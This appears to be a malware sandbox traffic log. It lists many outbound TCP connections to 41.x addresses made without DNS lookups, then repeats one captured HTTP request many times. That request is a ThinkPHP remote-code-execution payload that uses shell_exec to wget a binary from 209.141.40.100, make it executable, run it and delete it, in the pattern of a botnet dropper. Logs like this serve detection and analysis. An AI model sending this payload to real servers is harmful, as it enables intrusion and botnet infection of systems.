Source: unknown	TCP traffic detected without corresponding DNS query: 41.33.198.108
Source: unknown	TCP traffic detected without corresponding DNS query: 41.141.19.18
Source: unknown	TCP traffic detected without corresponding DNS query: 41.164.169.135
Source: unknown	TCP traffic detected without corresponding DNS query: 41.81.81.17
Source: unknown	TCP traffic detected without corresponding DNS query: 41.160.99.215
Source: unknown	TCP traffic detected without corresponding DNS query: 41.118.28.196
Source: unknown	TCP traffic detected without corresponding DNS query: 41.90.124.37
Source: unknown	TCP traffic detected without corresponding DNS query: 41.65.172.168
Source: unknown	TCP traffic detected without corresponding DNS query: 41.109.119.140
Source: unknown	TCP traffic detected without corresponding DNS query: 41.185.72.107
Source: unknown	TCP traffic detected without corresponding DNS query: 41.228.66.243
Source: unknown	TCP traffic detected without corresponding DNS query: 41.255.244.119
Source: unknown	TCP traffic detected without corresponding DNS query: 41.206.191.53
Source: unknown	TCP traffic detected without corresponding DNS query: 41.156.65.18
Source: unknown	TCP traffic detected without corresponding DNS query: 41.255.127.137
Source: unknown	TCP traffic detected without corresponding DNS query: 41.186.172.67
Source: unknown	TCP traffic detected without corresponding DNS query: 41.165.16.89
Source: unknown	TCP traffic detected without corresponding DNS query: 41.246.124.159
Source: unknown	TCP traffic detected without corresponding DNS query: 41.3.69.230
Source: unknown	TCP traffic detected without corresponding DNS query: 41.132.56.252
Source: unknown	TCP traffic detected without corresponding DNS query: 41.95.245.153
Source: unknown	TCP traffic detected without corresponding DNS query: 41.186.203.76
Source: unknown	TCP traffic detected without corresponding DNS query: 41.126.172.11
Source: unknown	TCP traffic detected without corresponding DNS query: 41.117.169.161
Source: unknown	TCP traffic detected without corresponding DNS query: 41.124.67.134
Source: unknown	TCP traffic detected without corresponding DNS query: 41.241.127.254
Source: unknown	TCP traffic detected without corresponding DNS query: 41.109.183.47
Source: unknown	TCP traffic detected without corresponding DNS query: 41.182.254.248
Source: unknown	TCP traffic detected without corresponding DNS query: 41.124.118.201
Source: unknown	TCP traffic detected without corresponding DNS query: 41.183.99.235
Source: unknown	TCP traffic detected without corresponding DNS query: 41.91.178.212
Source: unknown	TCP traffic detected without corresponding DNS query: 41.64.173.88
Source: unknown	TCP traffic detected without corresponding DNS query: 41.34.45.97
Source: unknown	TCP traffic detected without corresponding DNS query: 41.170.93.159
Source: unknown	TCP traffic detected without corresponding DNS query: 41.225.123.154
Source: unknown	TCP traffic detected without corresponding DNS query: 41.161.174.96
Source: unknown	TCP traffic detected without corresponding DNS query: 41.170.80.220
Source: unknown	TCP traffic detected without corresponding DNS query: 41.196.79.91
Source: unknown	TCP traffic detected without corresponding DNS query: 41.34.198.136
Source: unknown	TCP traffic detected without corresponding DNS query: 41.2.75.14

Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
